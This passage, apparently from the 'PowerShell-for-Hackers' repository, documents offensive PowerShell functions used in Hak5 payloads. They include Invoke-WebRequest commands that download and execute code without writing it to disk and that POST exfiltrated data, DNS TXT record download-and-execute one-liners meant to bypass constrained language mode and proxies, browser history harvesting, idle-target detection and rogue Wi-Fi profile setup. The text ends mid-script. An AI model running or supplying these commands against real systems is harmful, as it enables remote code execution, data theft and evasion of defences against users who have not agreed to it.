14 | 15 | Appreciate [UberGuidoZ](https://github.com/UberGuidoZ) for contributing to this function. 16 | 17 | # Invoke-WebRequest 18 | 19 |

20 | 21 | Python 22 | 23 |
YouTube Tutorial 24 |

25 | 26 | ## Description 27 | 28 | These functions are used to either download or upload files or data 29 | 30 | ## The Function 31 | 32 | ### [IWR-Save] 33 | 34 | This formatting of the IWR function will download a file from a selected URL and save it to the directory of your choosing 35 | 36 | This is helpful if you are trying to save an image or sound file to use in your script 37 | 38 | ------------------------------------------------------------------------------------------------------------------------------ 39 | 40 | $env:TMP\ 41 | 42 | Use this environment variable to save the file to your Temp directory 43 | 44 | $Env:USERPROFILE\Desktop\ 45 | 46 | Use this environment variable to save a file to your desktop 47 | 48 | ``` 49 | iwr < Your url for the intended file>?dl=1 -O $Env:USERPROFILE\Desktop\image.jpg 50 | ``` 51 | 52 | ### [IWR-Fileless] 53 | 54 | This formatting of the IWR function will download a file and execute it immediately without saving it to disk 55 | 56 | This is helpful if you are trying to download and execute a script without keeping it on the target's system. The script text is still handed to AMSI and, where script block logging is enabled, written to the PowerShell operational log (event ID 4104), so it is not invisible to the host 57 | 58 | ``` 59 | $pl = iwr < Your url for the intended file>?dl=1; invoke-expression $pl 60 | ``` 61 | 62 | ### [IWR-Post] 63 | 64 | This formatting of the IWR function will exfiltrate data via a DNS/POST 65 | 66 | This is helpful if you are trying to exfiltrate the data you have captured 67 | 68 | [Request Catcher](https://requestcatcher.com/)<-------Helpful website to test POST requests 69 | 70 | ``` 71 | iwr -Uri < Your url for posting the intended data> -Method POST -Body "text to upload" 72 | ``` 73 | 74 |

(back to top)

75 | 76 | 77 | ## Examples 78 | 79 | Listed below are payloads that have used one of these functions: 80 | 81 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 82 | 83 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 84 | 85 | [WallPaper-Troll](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Wallpaper-Troll) 86 | 87 | [Credz-Plz](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Credz-Plz) 88 | 89 |

(back to top)

90 | 91 | 92 | ## Contact 93 | 94 |

📱 My Socials 📱

95 |

(back to top)

129 | 130 | 131 | ## Acknowledgments 132 | 133 | * [Hak5](https://hak5.org/) 134 | * [UberGuidoZ](https://github.com/UberGuidoZ) 135 | 136 | *** 137 | 138 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 139 | 140 |

(back to top)

141 | -------------------------------------------------------------------------------- /Functions/B64.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
5 | Table of Contents 6 |
    7 |
  1. Description
  2. 8 |
  3. The Function
  4. 9 |
  5. Syntax
  6. 10 |
  7. Contact
  8. 11 |
  9. Acknowledgments
  10. 12 |
13 |
14 | 15 | # Base64 Encoding/Decoding 16 | 17 |

18 | 19 | Golang 20 | 21 |
YouTube Tutorial 22 |

23 | 24 | ## Description 25 | 26 | This function Encodes AND Decodes a File OR String 27 | 28 | ## The Function 29 | 30 | ### [B64] 31 | 32 | This function takes 1 parameter with 4 versions: 33 | 34 | [encFile] - encode file 35 | 36 | [encString] - encode string 37 | 38 | [decFile] - decode file 39 | 40 | [decString] - decode string 41 | Both encode modes produce Base64 of UTF-16LE bytes (`[System.Text.Encoding]::Unicode`), while both decode modes read the bytes back with `[System.Text.Encoding]::ASCII`, so decoding this function's own output returns the text with a NUL character after every letter. 42 | *** 43 | 44 | ## [SYNTAX] 45 | 46 | ### Encode a File 47 | 48 | B64 -encFile "C:\Users\User\Desktop\example.txt" 49 | 50 | ### Decode a File 51 | 52 | B64 -decFile "C:\Users\User\Desktop\example.txt" 53 | 54 | WARNING! When working with strings you have to wrap them in SINGLE QUOTES! 55 | 56 | ### Encode a String 57 | 58 | B64 -encString 'start notepad' 59 | 60 | ### Decode a String 61 | 62 | B64 -decString 'cwB0AGEAcgB0ACAAbgBvAHQAZQBwAGEAZAA=' 63 | 64 | ### Copy output directly to clipboard with the following syntax: 65 | 66 | COMMAND | clip 67 | 68 | *** 69 | 70 | ``` 71 | function B64 { 72 | [CmdletBinding(DefaultParameterSetName="encFile")] 73 | param( 74 | [Parameter(Position=0, ParameterSetName="encFile")] 75 | [Alias("ef")] 76 | [string]$encFile, 77 | 78 | [Parameter(Position=0, ParameterSetName="encString")] 79 | [Alias("es")] 80 | [string]$encString, 81 | 82 | [Parameter(Position=0, ParameterSetName="decFile")] 83 | [Alias("df")] 84 | [string]$decFile, 85 | 86 | [Parameter(Position=0, ParameterSetName="decString")] 87 | [Alias("ds")] 88 | [string]$decString 89 | 90 | ) 91 | 92 | if ($psCmdlet.ParameterSetName -eq "encFile") { 93 | $encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes((Get-Content -Path $encFile -Raw -Encoding UTF8))) 94 | return $encoded 95 | } 96 | 97 | elseif ($psCmdlet.ParameterSetName -eq "encString") { 98 | $encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($encString)) 99 | return $encoded 100 | } 101 | 102 | elseif ($psCmdlet.ParameterSetName -eq "decFile") { 103 | $data = Get-Content $decFile 104 | $decoded = 
[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($data)) 105 | return $decoded 106 | } 107 | 108 | elseif ($psCmdlet.ParameterSetName -eq "decString") { 109 | $decoded = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($decString)) 110 | return $decoded 111 | } 112 | } 113 | ``` 114 | 115 | 116 | 117 | 118 |


122 | 123 | 124 | ## Contact 125 | 126 |


161 | 162 | 163 | ## Acknowledgments 164 | 165 | * [Hak5](https://hak5.org/) 166 | * [UberGuidoZ](https://github.com/UberGuidoZ) 167 | 168 | *** 169 | 170 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 171 | 172 |


173 | -------------------------------------------------------------------------------- /Functions/B64-img.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
15 | 16 | # Base64 Image Converter 17 | 18 |


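## Description

These two functions can be used to convert an image to and from base64 format

## [SYNTAX]

### Encode an Image
```
img-b64 -img "C:\Users\user\Desktop\image.jpg" -location desk
```
### Decode a File
```
b64-img -file "C:\Users\user\Desktop\image.jpg" -location desk
```
## The Functions

### [img-b64]

This function will convert your image to base64 format

Use the image tag to provide the path of the image you are trying to convert

Using the Location parameter will determine if the file containing the base64 code is saved to the desktop or temp folder

If no location is designated it will save it to the desktop by default

```
function img-b64 {
    <#
    .SYNOPSIS
    Writes the Base64 text of a file's bytes to encImage.txt.

    .PARAMETER img
    Path of the image file to encode.

    .PARAMETER location
    'desk' (default) writes to the current user's Desktop, 'temp' writes to $env:TMP.
    #>
    [CmdletBinding()]
    param (
        [Parameter (Mandatory = $True, ValueFromPipeline = $True)]
        [string]$img,

        [Parameter (Mandatory = $False)]
        [ValidateSet('desk', 'temp')]
        [string]$location
    )

    if (!$location) {$location = "desk"}

    $loc = switch ( $location )
    {
        "desk" { "$Env:USERPROFILE\Desktop" }
        "temp" { "$env:TMP" }
    }

    # Read the bytes through .NET: Get-Content -Encoding Byte exists only in Windows
    # PowerShell. Convert-Path supplies the full path, because .NET does not follow
    # the PowerShell working directory.
    $bytes = [IO.File]::ReadAllBytes((Convert-Path -LiteralPath $img))

    # Overwrite rather than append (the original used >>): a second run would otherwise
    # leave two Base64 strings in the file, which b64-img cannot decode.
    [Convert]::ToBase64String($bytes) | Set-Content -LiteralPath "$loc\encImage.txt" -Encoding ASCII
}
```

### [b64-img]

This function will convert your base64 encoded file back into an image

Use the file tag to provide the path of the file you are trying to convert

Using the Location parameter will determine if the file containing the base64 code is saved to the desktop or temp folder

If no location is designated it will save it to the desktop by default

```
function b64-img {
    <#
    .SYNOPSIS
    Decodes a file of Base64 text into an image saved as decImage.jpg.

    .PARAMETER file
    Path of the file holding the Base64 text.

    .PARAMETER location
    'desk' (default) saves to the current user's Desktop, 'temp' saves to $env:TMP.
    #>
    [CmdletBinding()]
    param (
        [Parameter (Mandatory = $True)]
        [string]$file,

        [Parameter (Mandatory = $False)]
        [ValidateSet('desk', 'temp')]
        [string]$location
    )

    if (!$location) {$location = "desk"}

    $loc = switch ( $location )
    {
        "desk" { "$Env:USERPROFILE\Desktop" }
        "temp" { "$env:TMP" }
    }

    Add-Type -AssemblyName System.Drawing
    $Base64 = Get-Content -Raw -Path $file
    $stream = [IO.MemoryStream][Convert]::FromBase64String($Base64)
    try {
        # FromStream throws if the decoded bytes are not an image System.Drawing can read.
        $Image = [Drawing.Bitmap]::FromStream($stream)
        try {
            # The file name always ends in .jpg, whatever format the decoded image has.
            $Image.Save("$loc\decImage.jpg")
        }
        finally {
            # Release the GDI+ handle even when Save fails.
            $Image.Dispose()
        }
    }
    finally {
        $stream.Dispose()
    }
}
```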


117 | 118 | 119 | ## Examples 120 | 121 | Listed below are payloads that have used one of these functions: 122 | 123 |


124 | 125 | 126 | ## Contact 127 | 128 |


163 | 164 | 165 | ## Acknowledgments 166 | 167 | * [Hak5](https://hak5.org/) 168 | * [UberGuidoZ](https://github.com/UberGuidoZ) 169 | 170 | *** 171 | 172 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 173 | 174 |


175 | -------------------------------------------------------------------------------- /Functions/Get-BrowserData.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
14 | 15 | # Get-BrowserData 16 | 17 |


23 | 24 | ## Description 25 | 26 | This function can be used to retrieve the browsing history and bookmarks from edge, chrome, and firefox (no bookmarks from firefox currently) 27 | 28 | ## The Function 29 | 30 | ### [Get-BrowserData] 31 | 32 | In this function we will pass the browser name and data type (history/bookmarks) as parameter to retrieve the intended data 33 | 34 | ``` 35 | function Get-BrowserData { 36 | 37 | [CmdletBinding()] 38 | param ( 39 | [Parameter (Position=1,Mandatory = $True)] 40 | [string]$Browser, 41 | [Parameter (Position=1,Mandatory = $True)] 42 | [string]$DataType 43 | ) 44 | 45 | $Regex = '(http|https)://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?' 46 | 47 | if ($Browser -eq 'chrome' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\History"} 48 | elseif ($Browser -eq 'chrome' -and $DataType -eq 'bookmarks' ) {$Path = "$Env:USERPROFILE\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"} 49 | elseif ($Browser -eq 'edge' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Local\Microsoft/Edge/User Data/Default/History"} 50 | elseif ($Browser -eq 'edge' -and $DataType -eq 'bookmarks' ) {$Path = "$env:USERPROFILE/AppData/Local/Microsoft/Edge/User Data/Default/Bookmarks"} 51 | elseif ($Browser -eq 'firefox' -and $DataType -eq 'history' ) {$Path = "$Env:USERPROFILE\AppData\Roaming\Mozilla\Firefox\Profiles\*.default-release\places.sqlite"} 52 | 53 | 54 | $Value = Get-Content -Path $Path | Select-String -AllMatches $regex |% {($_.Matches).Value} |Sort -Unique 55 | $Value | ForEach-Object { 56 | $Key = $_ 57 | if ($Key -match $Search){ 58 | New-Object -TypeName PSObject -Property @{ 59 | User = $env:UserName 60 | Browser = $Browser 61 | DataType = $DataType 62 | Data = $_ 63 | } 64 | } 65 | } 66 | } 67 | ``` 68 | SYNTAX: 69 | 70 | ``` 71 | Get-BrowserData -Browser "edge" -DataType "history" 72 | 73 | Get-BrowserData -Browser "edge" -DataType "bookmarks" 74 | 75 | Get-BrowserData 
-Browser "chrome" -DataType "history" 76 | 77 | Get-BrowserData -Browser "chrome" -DataType "bookmarks" 78 | 79 | Get-BrowserData -Browser "firefox" -DataType "history" 80 | ``` 81 | 82 |


83 | 84 | 85 | ## Examples 86 | 87 | Listed below are payloads that have used one of these functions: 88 | 89 | [Adv-Recon](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon) 90 | 91 | 92 | 93 | 94 |


95 | 96 | 97 | ## Contact 98 | 99 |


134 | 135 | 136 | ## Acknowledgments 137 | 138 | * [Hak5](https://hak5.org/) 139 | * [UberGuidoZ](https://github.com/UberGuidoZ) 140 | 141 | *** 142 | 143 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 144 | 145 |


146 | -------------------------------------------------------------------------------- /Functions/Detect-Mouse-Movement.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
14 | 15 | # Detect-Mouse-Movement 16 | 17 |


23 | 24 | ## Description 25 | 26 | Detecting the mouse movement of a target could be helpful in 2 different situations. 27 | Finding out if they just came back to their PC 28 | or finding out if they stepped away from their PC. These functions will pause your script 29 | Until one of these conditions are met. 30 | 31 | ## The Functions 32 | 33 | ### [Target-Comes] 34 | In this first function the position of the cursor will be checked every 3 seconds 35 | 36 | If the position of the cursor has not changed the capslock button will be pressed every 3 seconds as well 37 | 38 | This is to stop the screen from sleeping and use the capslock light as an indicator the function is still waiting 39 | 40 | When the position of the cursor is different the function will break out of the loop and resume the script 41 | 42 | This is helpful if you are wanting to run a script once they return to their computer 43 | 44 | ```powershell 45 | function Target-Comes { 46 | Add-Type -AssemblyName System.Windows.Forms 47 | $originalPOS = [System.Windows.Forms.Cursor]::Position.X 48 | $o=New-Object -ComObject WScript.Shell 49 | 50 | while (1) { 51 | $pauseTime = 3 52 | if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){ 53 | break 54 | } 55 | else { 56 | $o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime 57 | } 58 | } 59 | } 60 | ``` 61 | 62 | ### [Target-Leaves] 63 | In the second function the position of the cursor will be checked 64 | 65 | Then the script will sleep for the number of seconds defined by the $PauseTime variable 66 | 67 | If the cursor is in the same position it will break out of the function and continue the script 68 | 69 | This is helpful if you are trying to determine if the target is away to run a script while they are gone 70 | 71 |


```powershell
function Target-Leaves {
    <#
    .SYNOPSIS
    Blocks until the cursor's X coordinate is unchanged across one wait interval.

    .PARAMETER Seconds
    Length of the wait interval, in seconds, between the two cursor readings.
    #>
    [CmdletBinding()]
    param (
        [Parameter (Position=0, Mandatory = $True)]
        [Int]$Seconds
    )
    Add-Type -AssemblyName System.Windows.Forms

    do {
        # Only the horizontal coordinate is sampled; a purely vertical move is not seen.
        $startX = [System.Windows.Forms.Cursor]::Position.X
        Start-Sleep -Seconds $Seconds
        $unchanged = ([System.Windows.Forms.Cursor]::Position.X -eq $startX)

        # The cursor moved during the interval: pause one second, then sample again.
        if (-not $unchanged) {
            Start-Sleep -Seconds 1
        }
    } until ($unchanged)
}
```


95 | 96 | 97 | ## Examples 98 | 99 | Listed below are payloads that have used one of these functions: 100 | 101 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 102 | 103 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 104 | 105 | 106 |


107 | 108 | 109 | ## Contact 110 | 111 |


146 | 147 | 148 | ## Acknowledgments 149 | 150 | * [Hak5](https://hak5.org/) 151 | * [UberGuidoZ](https://github.com/UberGuidoZ) 152 | 153 | *** 154 | 155 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 156 | 157 |


158 | -------------------------------------------------------------------------------- /Functions/ns-lookup.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
14 | 15 | # NS-Lookup 16 | 17 |


## Description

This concept was introduced to me VIA my friend Alh4zr3d on [twitter](https://twitter.com/Alh4zr3d/status/1566489367232651264?s=20&t=JXNaXH1m76yL31VdSzlyNg)

This abuses the ability to pull down dns txt records from a website and execute the output

This is especially helpful on systems using powershell constrained language and blocking Invoke-WebRequest or Invoke-Expression

Because the script text arrives in a DNS answer rather than over HTTP, web proxies and restrictions on the download cmdlets never see it. It does show up in DNS query logs (TXT lookups made by a workstation), in process command-line auditing (`nslookup -q=txt` or `Resolve-DnsName ... TXT` feeding PowerShell) and in PowerShell script block logging.

## Commands

The following commands will be referencing the DNS TXT Records shown in the below image

*(image of the DNS TXT records not reproduced here)*

### [Single TXT Record Execution]

This nslookup example is how I was introduced to this concept originally.

It is used to pull down a single TXT Record and execute it

`example` is referencing one of the DNS TXT Records in the image above.

Replace it with the name of your TXT Record and replace the website URL with your own

This will execute a simple echo command to show it works

```
powershell . (nslookup -q=txt example.iamjakoby.com)[-1]
```

More complex payloads are of course possible.

Running the following example below will make you automatically subscribe to my youtube channel (you should try it)

```
powershell . (nslookup -q=txt sub.iamjakoby.com)[-1]
```

### Take NOTE

The previous examples will only work when executed in a powershell window.

If it is your intention to use them in the Run Box they have to be modified as follows:

```
powershell "powershell . (nslookup -q=txt sub.iamjakoby.com)[-1]"
```

### [Multiple TXT Record Execution]

The issue with pulling down a single TXT Record is they have a character limit of 255

So in order to execute longer scripts you have to pull down multiple records and combine them

The following modified version I wrote will do just that

`1..3` refers to DNS TXT Records 1, 2, and 3 in the image above.

This will pull them down in that order, combine them, and then execute the result

```
1..3|%{$p+=Resolve-DnsName "$_.iamjakoby.com." -Ty TXT |% S*s};& ([scriptblock]::Create($p))
```

Like the first example, however, there needs to be a modification to use it in the Run Box

The `" "` need to be escaped with a `\` for it to function as intended

```
powershell 1..3|%{$p+=Resolve-DnsName \"$_.iamjakoby.com.\" -Ty TXT -EA 0|% S*s};& ([scriptblock]::Create($p))
```


97 | 98 | 99 | ## Examples 100 | 101 | Listed below are payloads that can use one of these commands: 102 | 103 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 104 | 105 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 106 | 107 | [WallPaper-Troll](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Wallpaper-Troll) 108 | 109 | [Credz-Plz](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Credz-Plz) 110 | 111 |


112 | 113 | 114 | ## Contact 115 | 116 |


151 | 152 | 153 | ## Acknowledgments 154 | 155 | * [Hak5](https://hak5.org/) 156 | 157 | *** 158 | 159 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 160 | 161 |


162 | -------------------------------------------------------------------------------- /Functions/Add-Network.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
14 | 15 | # Add-NetWork 16 | 17 |


23 | 24 | ## Description 25 | 26 | This function will add a network profile to your targets PC 27 | 28 | ## The Function 29 | 30 | ### [Add-NetWork] 31 | 32 | This function will accept 3 parameters, 1 is mandatory 33 | 34 | You always have to provide the $SSID to give your network a name 35 | 36 | The $Security parameter is defined automatically when providing a password or not 37 | 38 | This will tell the function whether or not you need a wifi password for your network 39 | 40 | If a wifi password is deemed necessary you provide it using the $PW variable 41 | 42 | Set-up a new network profile on your targets PC using the following syntax: 43 | 44 | ``` 45 | For a network profile using a Password use: 46 | 47 | Add-NetWork -SSID wifi-name -PW wifi-password 48 | 49 | For a network profile NOT using a Password use: 50 | 51 | Add-NetWork -SSID wifi-name 52 | 53 | ``` 54 | 55 | 56 | ``` 57 | function Add-NetWork { 58 | 59 | [CmdletBinding()] 60 | param ( 61 | [Parameter (Mandatory = $True)] 62 | [string]$SSID, 63 | 64 | [Parameter (Mandatory = $False)] 65 | [Alias("s")] 66 | [string]$Security, 67 | 68 | [Parameter (Mandatory = $False)] 69 | [string]$PW 70 | 71 | ) 72 | 73 | if (!$PW) {$Security = "f"} 74 | if ($PW) {$Security = "t"} 75 | 76 | # ------------------------------------------------------------------------------------------------- 77 | 78 | $sec = switch ( $Security ) 79 | { 80 | "t" { 81 | " 82 | 83 | 84 | WPA2PSK 85 | AES 86 | false 87 | 88 | 89 | passPhrase 90 | false 91 | $PW 92 | 93 | 94 | " 95 | } 96 | "f" { 97 | 98 | " 99 | 100 | 101 | open 102 | none 103 | false 104 | 105 | 106 | " 107 | 108 | } 109 | } 110 | 111 | # ------------------------------------------------------------------------------------------------- 112 | 113 | $profilefile="ACprofile.xml" 114 | $SSIDHEX=($SSID.ToCharArray() |foreach-object {'{0:X}' -f ([int]$_)}) -join'' 115 | $xmlfile=" 116 | 117 | $SSID 118 | 119 | 120 | $SSIDHEX 121 | $SSID 122 | 123 | 124 | ESS 125 | auto 126 | 127 
| $sec 128 | 129 | 130 | " 131 | 132 | $XMLFILE > ($profilefile) 133 | netsh wlan add profile filename="$($profilefile)" 134 | } 135 | ``` 136 | 137 |


138 | 139 | 140 | ## Examples 141 | 142 | Listed below are payloads that have used one of these functions: 143 | 144 | [PineApple](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-PineApple) 145 | 146 | 147 |


148 | 149 | 150 | ## Contact 151 | 152 |


187 | 188 | 189 | ## Acknowledgments 190 | 191 | * [Hak5](https://hak5.org/) 192 | * [UberGuidoZ](https://github.com/UberGuidoZ) 193 | 194 | *** 195 | 196 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 197 | 198 |


199 | -------------------------------------------------------------------------------- /Functions/Set-WallPaper.md: -------------------------------------------------------------------------------- 1 | ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true) 2 | 3 | 4 |
14 | 15 | # Set-WallPaper 16 | 17 |


23 | 24 | ## Description 25 | 26 | This function will set the targets wallpaper to the provided image 27 | 28 | ## The Function 29 | 30 | ### [Set-WallPaper] 31 | 32 | Using the following syntax will set the targets desktop wallpaper to an image of your choosing: 33 | 34 | ``` 35 | Set-WallPaper -Image "$Env:USERPROFILE\Desktop\$ImageName.jpg" -Style Center 36 | ``` 37 | 38 | ``` 39 | Function Set-WallPaper { 40 | 41 | <# 42 | 43 | .SYNOPSIS 44 | Applies a specified wallpaper to the current user's desktop 45 | 46 | .PARAMETER Image 47 | Provide the exact path to the image 48 | 49 | .PARAMETER Style 50 | Provide wallpaper style (Example: Fill, Fit, Stretch, Tile, Center, or Span) 51 | 52 | .EXAMPLE 53 | Set-WallPaper -Image "C:\Wallpaper\Default.jpg" 54 | Set-WallPaper -Image "C:\Wallpaper\Background.jpg" -Style Fit 55 | 56 | #> 57 | 58 | 59 | param ( 60 | [parameter(Mandatory=$True)] 61 | # Provide path to image 62 | [string]$Image, 63 | # Provide wallpaper style that you would like applied 64 | [parameter(Mandatory=$False)] 65 | [ValidateSet('Fill', 'Fit', 'Stretch', 'Tile', 'Center', 'Span')] 66 | [string]$Style 67 | ) 68 | 69 | $WallpaperStyle = Switch ($Style) { 70 | 71 | "Fill" {"10"} 72 | "Fit" {"6"} 73 | "Stretch" {"2"} 74 | "Tile" {"0"} 75 | "Center" {"0"} 76 | "Span" {"22"} 77 | 78 | } 79 | 80 | If($Style -eq "Tile") { 81 | 82 | New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force 83 | New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 1 -Force 84 | 85 | } 86 | Else { 87 | 88 | New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name WallpaperStyle -PropertyType String -Value $WallpaperStyle -Force 89 | New-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name TileWallpaper -PropertyType String -Value 0 -Force 90 | 91 | } 92 | 93 | Add-Type -TypeDefinition @" 94 | using System; 95 | using System.Runtime.InteropServices; 96 | 97 | 
public class Params 98 | { 99 | [DllImport("User32.dll",CharSet=CharSet.Unicode)] 100 | public static extern int SystemParametersInfo (Int32 uAction, 101 | Int32 uParam, 102 | String lpvParam, 103 | Int32 fuWinIni); 104 | } 105 | "@ 106 | 107 | $SPI_SETDESKWALLPAPER = 0x0014 108 | $UpdateIniFile = 0x01 109 | $SendChangeEvent = 0x02 110 | 111 | $fWinIni = $UpdateIniFile -bor $SendChangeEvent 112 | 113 | $ret = [Params]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $Image, $fWinIni) 114 | } 115 | ``` 116 | 117 |


118 | 119 | 120 | ## Examples 121 | [//]: # (Examples of scripts that have used your function) 122 | Listed below are payloads that have used one of these functions: 123 | 124 | [Acid Burn](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-AcidBurn) 125 | 126 | [JumpScare](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-JumpScare) 127 | 128 | [WallPaper-Troll](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-Wallpaper-Troll) 129 | 130 | 131 |


132 | 133 | 134 | ## Contact 135 | 136 |


171 | 172 | 173 | ## Acknowledgments 174 | 175 | * [Hak5](https://hak5.org/) 176 | * [UberGuidoZ](https://github.com/UberGuidoZ) 177 | 178 | *** 179 | 180 | [HOME-PAGE](https://github.com/I-Am-Jakoby/PowerShell-for-Hackers) 181 | 182 |


183 | -------------------------------------------------------------------------------- /VideoNotes/sendTCP.md: -------------------------------------------------------------------------------- 1 | ```powershell 2 | function Send-TcpMessage { 3 | param( 4 | [Parameter(Mandatory = $true)] 5 | [string]$TargetIP, 6 | 7 | [Parameter(Mandatory = $true)] 8 | [int]$TargetPort, 9 | 10 | [Parameter(Mandatory = $true)] 11 | [string]$Message 12 | ) 13 | 14 | try { 15 | $IP = [System.Net.Dns]::GetHostAddresses($TargetIP)[0] 16 | $Address = [System.Net.IPAddress]::Parse($IP) 17 | $Socket = New-Object System.Net.Sockets.TCPClient($Address, $TargetPort) 18 | $Stream = $Socket.GetStream() 19 | $Writer = New-Object System.IO.StreamWriter($Stream) 20 | $Writer.WriteLine($Message) 21 | $Writer.Flush() 22 | $Stream.Close() 23 | $Socket.Close() 24 | 25 | Write-Output "✔️ Message sent to $TargetIP : $TargetPort." 26 | } catch { 27 | Write-Error "⚠️ Error in sending message: $($_.Exception.Message)" 28 | } 29 | } 30 | 31 | # Load necessary assembly for Windows Forms 32 | Add-Type -AssemblyName System.Windows.Forms 33 | 34 | # Create the main form with dark background 35 | $form = New-Object System.Windows.Forms.Form 36 | $form.Text = 'Chat Room' 37 | $form.Size = New-Object System.Drawing.Size(600, 450) # Adjusted form size 38 | $form.BackColor = [System.Drawing.Color]::FromArgb(45, 45, 48) 39 | $form.AutoScaleMode = 'Dpi' 40 | 41 | # Create a RichTextBox for displaying messages with dark theme 42 | $richTextBoxDisplay = New-Object System.Windows.Forms.RichTextBox 43 | $richTextBoxDisplay.Location = New-Object System.Drawing.Point(10, 10) 44 | $richTextBoxDisplay.Size = New-Object System.Drawing.Size(460, 300) 45 | $richTextBoxDisplay.Anchor = 'Top,Left,Right,Bottom' 46 | $richTextBoxDisplay.BackColor = [System.Drawing.Color]::FromArgb(30, 30, 30) 47 | $richTextBoxDisplay.ForeColor = [System.Drawing.Color]::WhiteSmoke 48 | $form.Controls.Add($richTextBoxDisplay) 49 | 50 | # Create a 
textbox for typing messages with dark theme 51 | $textBoxInput = New-Object System.Windows.Forms.TextBox 52 | $textBoxInput.Location = New-Object System.Drawing.Point(10, 320) 53 | $textBoxInput.Size = New-Object System.Drawing.Size(360, 20) 54 | $textBoxInput.Anchor = 'Bottom,Left,Right' 55 | $textBoxInput.BackColor = [System.Drawing.Color]::FromArgb(30, 30, 30) 56 | $textBoxInput.ForeColor = [System.Drawing.Color]::WhiteSmoke 57 | $form.Controls.Add($textBoxInput) 58 | 59 | # Create a button for sending messages with dark theme 60 | $buttonSend = New-Object System.Windows.Forms.Button 61 | $buttonSend.Location = New-Object System.Drawing.Point(380, 320) 62 | $buttonSend.Size = New-Object System.Drawing.Size(90, 20) 63 | $buttonSend.Anchor = 'Bottom,Right' 64 | $buttonSend.Text = 'Send' 65 | $buttonSend.BackColor = [System.Drawing.Color]::FromArgb(70, 70, 70) 66 | $buttonSend.ForeColor = [System.Drawing.Color]::WhiteSmoke 67 | $form.Controls.Add($buttonSend) 68 | 69 | # Create textboxes for target IP and Port with labels and anchor them 70 | $labelIP = New-Object System.Windows.Forms.Label 71 | $labelIP.Location = New-Object System.Drawing.Point(10, 350) 72 | $labelIP.Size = New-Object System.Drawing.Size(100, 20) 73 | $labelIP.Text = "Target IP:" 74 | $labelIP.ForeColor = [System.Drawing.Color]::White 75 | $labelIP.Anchor = 'Bottom,Left' # Anchor to bottom left 76 | $form.Controls.Add($labelIP) 77 | 78 | $textBoxIP = New-Object System.Windows.Forms.TextBox 79 | $textBoxIP.Location = New-Object System.Drawing.Point(120, 350) 80 | $textBoxIP.Size = New-Object System.Drawing.Size(150, 20) 81 | $textBoxIP.BackColor = [System.Drawing.Color]::FromArgb(30, 30, 30) 82 | $textBoxIP.ForeColor = [System.Drawing.Color]::WhiteSmoke 83 | $textBoxIP.Anchor = 'Bottom,Left' # 